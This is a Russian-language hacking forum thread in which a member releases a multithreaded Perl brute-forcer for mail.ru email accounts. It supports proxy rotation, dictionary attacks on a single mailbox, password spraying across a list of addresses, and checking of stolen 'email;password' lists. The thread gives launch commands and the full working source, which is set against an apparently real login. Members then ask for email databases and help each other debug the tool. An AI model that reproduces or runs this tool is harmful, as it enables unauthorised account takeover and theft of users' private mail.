![]() |
Mail.ru bruter
MAIL.RU bruter perl-скрипт
1. Брутит через стандартную пост-формочку наибычнейшей авторизации по адресу http://win.mail.ru/cgi-bin/auth 2. Возможность работы как с прокси так и без 3. Автосмена прокси 4. Возможность выставить кол-во попыток авторизации с одного прокси (доходит до последней - возвращается на первую - круговая система) 5. Многопоточный 6. Три режима работы: примеры bat-файлов для запуска (win, никсы сами разберутся :cool: ): =================================== Режим брута одного мыла, 10 потоков, таймаут 5 сек, без прокси: Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 0 10 5 0Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 0 10 5 1 10Режим брута списка мыл по паролю, 10 потоков, таймаут 5 сек, без прокси: Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 1 10 5 0Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 1 10 5 1 10Режим чека списка "мыло;пароль", 10 потоков, таймаут 5 сек, без прокси: Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 2 10 5 0Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 2 10 5 1 10Код:
#!/usr/bin/perl - UTF-8 encoding |
Pashkela, молодец :) Только сделай брут на login;pass
|
2 mailbrush:
просто никогда брутом мыл не занимался - как лучше сделать - просто логин;пасс или как вообще списки для брута мыл выглядят - я думал что так: 123@mail.ru;пароль в смысле откедова домен-то брать? или и так и так сделать - с ручным указанием домена (тогда просто логин/пароль) и просто по готову списку именно мыльников/паролей? Нужна ли работа без прокси? Просто в последних темах в "email" парни ищут чото актуальное, решил написать, тем более все уже сделано до нас PS: Ну и как лучше - меню как в тулзе или через цмд-параметры? Могу соксы прикрутить, был бы спрос, а то так понимаю, такими вещами барыжат ( кстати, а сколько они стоят? :D ) |
оу, гуд, а я уже хотел свой написать, с блекджеком и шлюхами..
|
Pashkela на высоте!
мы все будем оч признательны за брут на логин/pass |
Цитата:
1. просто логин;пас (как для брута ну я не знаю, входа в админку сайта) с выбором домена (например mail.ru) 2. или логин@mail.ru;pass - для фактически не брута, а чека имеющегося списка мыл вы же этим если занимаетесь - распишите четко, что нужно. Т.к. для меня пункт 1 например вообще непонятен, что вы собрались брутить по словарю логин/пасс - случайно попавшиеся мыльники что ли? Брут конкретного мыла по словарю и так есть. В общем подробности в студию Если туплю я, и актуален только пункт 2 - так и напишите, да, именно как в пункте 2, нужен чекер имеющейся базы мыл PS: Пока ушел писать чекер - читай, пункт 2, потому что пункт 1 для меня зогадко |
неплохо было бы вынести частоизменяемые настройки в ini файл или в аргументы скрипта. к примеру пути до словарей.
по поводу логин\пасс: конечно же чекер! и не придётся делать 2 режима подбора пароля, такие списки универсальны. по 1 мылу: xx1@xx.xx;password1 xx1@xx.xx;password2 по 1 паролю: xx2@xx.xx;pass1 xx3@xx.xx;pass1 |
о, теперь понятно, скоро будет
|
я в перле не силён, но посмотрев на скрипт мне кажется что в нем нет проверки на появление капчи. ведь если она появится, то даже верный пасс примется как неверный. неплохо было бы это предусмотреть в скрипте.
|
дык прокси для этого и есть и кол-во попыток авторизации с одной прокси
|
Цитата:
|
ну да, ага, правильно. Но пока не предусмотрено, пока не до этого. Может и будет проверка
|
Люди долбрые обьясните плиз как ним юзать создаю, passwords.txt- файл с паролями туда пихаю пароли по одному в строчку, потом создаю proxy.txt- файл с проксями туда пихаю прокси, далее results.txt- Файл для записи результатов, а где писать логин мыла или само мыло, количество потоков и.т.д
Обьясните плиз как ним пользоваться, а то очень нужно, буду очень благодарен, заранее спасибо))) |
так на майлру разве выводится каптча при неверных вводах? Никогда не видел.
|
У меня гуды пропускает,верных пасов в password.txt накидал а результатов нет,прокси все рабочие.И еще после использования последний прокси сразу бы на первую неплохо было бы чтоб перепрыгивал
|
рекомендуемое кол-во потоков - 20
рекомендуемый таймаут - 10 сек (мин) зависит от качества прокси. Все, что связано с прокси - зависит от их качества. Качество != бесплатные прокси по поводу "прыгать на первую" прикольно. Прикручу |
Цитата:
|
2 maximka555:
у меня находит, что я делаю не так?:) Скинь сюда свои настройки, или в личку (включая мыло, сделай тестовое) |
мои настройки
use IO::Socket; use threads; use threads::shared; my $num : shared; my $i : shared; my $z : shared; ################################################## ### my $login = "9102266370"; # логин my $domain = "mail.ru"; # домен $kol_threads = 20; # кол-во потоков $timeout = 10; # таймаут $attempt = 5; # через сколько попыток менять прокси $proxy_file = "proxy.txt"; # файл с проксями $passwords_file = "passwords.txt"; # файл с паролями ################################################## #### print "----------------------------------------------------------\n"; print "Mail.ru bruter by Pashkela [ BugTrack Team ] (c) 2010\n"; print "----------------------------------------------------------\n"; open(FILE1, "<", $proxy_file); while(<FILE1>) { chomp; if ($_) {push(@prox, $_);} } open(FILE2, "<", $passwords_file); while(<FILE2>) { chomp; if ($_) {push(@pass, $_);} } close(FILE2); open( FILE, ">>" . "results.txt" ); # Файл для записи результатов $size = @prox; $size1 = @pass; $thr = $kol_threads; # Кол-во потоков $num = -1; # Не меняется $i = 0; $z = 0; print "----------------------\n"; print "Mail - " . $login . '@' . $domain . "\n"; print "Threads - $kol_threads\n"; print "Timeout - $timeout sec\n"; print "Attempts for one proxy - $attempt\n"; print "Proxies - $size\n"; print "Passwords - $size1\n"; print "----------------------\n"; for(0..$thr) { $trl[$_] = threads->create(\&gets); } for(0..$thr) { $trl[$_]->join; } sub gets { $| = 1; while ($num < $size1) { { lock($num); $num++; } $z++; $password = ""; if ($z == $attempt) { $z = 0; if ($i < ($size-1)) { $i++; print "\n"; } } $password = $pass[$num]; $current_proxy = $prox[$i]; ($current_proxy_host,$current_proxy_port) = split(/:/,$current_proxy); print $num . " current proxy: " . $current_proxy_host . ":" . $current_proxy_port . "[$i]\r"; $answ1 = req('win.mail.ru', '/cgi-bin/auth', 'POST', "Login=$login&Domain=$domain&Password=$passwor d", 0); $ck1 = collect($answ1); $answ1 =~ /<HTML>http:\/\/win.mail.ru(.+?)<\/HTML>/; req('win.mail.ru', $1, 'GET', 0, $ck1); $answ2 = req('win.mail.ru', '/cgi-bin/start?back=1', 'GET', 0, $ck1); if ($answ2 =~ m/msglist/img) { print "\n----------------------\n"; print "[ Found password! Saved in result.txt ]\n"; print "----------------------\n\n\n\n\n"; print FILE "mail: [". $login . '@' . $domain . "], password: " . $password . "\n"; close(FILE); exit; } $num++; print $num . "\r"; sleep 1; } } sub collect { my $data = $_[0]; my $cookie = undef; while($data =~ /Set-Cookie: (.+?)(;|\r)/igs) { $cookie .= $1."; "; } return $cookie; } sub req { my($host, $path, $type, $data, $cookies) = @_; my $request = "$type $path HTTP/1.0\n". "Host: $host\n". "Cookie: $cookies\n"; $request .= "Content-type: application/x-www-form-urlencoded\n". "Content-Length: ".length($data)."\n\n".$data; if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) { print $socket $request; my $answ = undef; $socket->autoflush(1); while(my $buf = <$socket>) { $answ .= $buf; } close $socket; return $answ; } } пароль к мылу в личке |
у меня есть брутер но я не уверен что работает отлично
|
2 maximka555:
проверил, все работает, проверял на таких проксях: https://forum.antichat.ru/thread53202.html PS: мы с тобой неправильно тест проводим, дай ЕЩЕ одно тестовое мыло и СПИСОК паролей, штук десять, среди которых 1 правильный, какой правильный не говори, я его должен буду сам найти, гы Аська в профиле |
кинул в личку
|
я конечно извиняюсь, но прокси такого формата:
qa1s-thub-pub.photoworks.com:80 не поддерживаются, кхм ПЛЮС будь внимательней, в том списке паролей, что у тебя лежат в passwords.txt в последнем варианте на слил.ру нет правильного пароля Как так можно проверять - не понимаю. PS: Проверил еще раз - все прекрасненько работает |
а почему не работает с обычными проксями?Опять кинул в личку,не как он правельный пас не находит
|
я юзнаю от здесь был я брут. все четко.
|
Демка в один паток?Всю жизнь им будеш брутить
|
Цитата:
|
Цитата:
|
нет, на твоих - нет. Там идет реальная авторизация, куки и все такое, нужны нормальные прокси, там не простой get-запрос
|
Pashkela спасибо за труды, сможеш cделать наоборот, брут списка мыл, по 1 паролю? :)
|
в процессе
PS: Чтобы больше не было вопросов по проксям - гоу в асечные темы, процесс подбора проксей одинаковый, если вы хотите халявные прокси |
Цитата:
|
update:
Три режима работы: примеры bat-файлов для запуска (win, никсы сами разберутся :cool: ): =================================== Режим брута одного мыла, 10 потоков, таймаут 5 сек, без прокси: Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 0 10 5 0Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 0 10 5 1 10Режим брута списка мыл по паролю, 10 потоков, таймаут 5 сек, без прокси: Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 1 10 5 0Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 1 10 5 1 10Режим чека списка "мыло;пароль", 10 потоков, таймаут 5 сек, без прокси: Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 2 10 5 0Код:
cmd /k C:\Perl1\bin\perl.exe mail.ru.bruter.pl 2 10 5 1 10PS: Не забывайте благодарить также Kaimi, на основе его скрипта авторизации на mail.ru: http://forum.antichat.ru/printthread.php?t=116399 и сделан брутер |
Pashkela, спасибо большое. Актуальный скрипт написал.
Цитата:
Ушел юзать.... |
где взять базу мыл?
и еще расскажите пошагово как запускать.какие компоненты нужны для работы |
Пробую без проксей, если верный пасс ставить в начало списка, то находит, если дальше 10 то уже пропускает гуды.
|
больше таймаут, меньше потоков и т.д. От очень много зависит - от твоего интернета, от того, банит ли mail.ru за много попыток с одного IP (думаю разумеется) и т.д.
|
Как же его запустить то?
Инторпретатор перла у меня установлен! Делаю все нужные файлы запускай скрипт толку 0! Если можно выложите настройки на брут, много мыл на один пасс) |
UPD
Разобрался. Добавил =~ s/\r//; После chomp; Словари и списки проксей создавал под виндой, а запускал скрипт на линуксе, вот и была нестыковочка :) |
| Время: 10:15 |